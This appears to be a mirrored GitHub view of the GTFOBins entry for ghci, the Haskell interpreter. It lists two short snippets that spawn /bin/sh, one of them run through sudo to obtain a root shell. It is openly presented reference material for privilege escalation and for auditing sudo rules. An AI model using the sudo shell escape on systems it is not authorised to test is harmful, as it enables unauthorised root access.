1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/ghci.md
2020-10-24 12:46:42 +02:00

12 lines
181 B
Markdown

---
functions:
shell:
- code: |
ghci
System.Process.callCommand "/bin/sh"
sudo:
- code: |
sudo ghci
System.Process.callCommand "/bin/sh"
---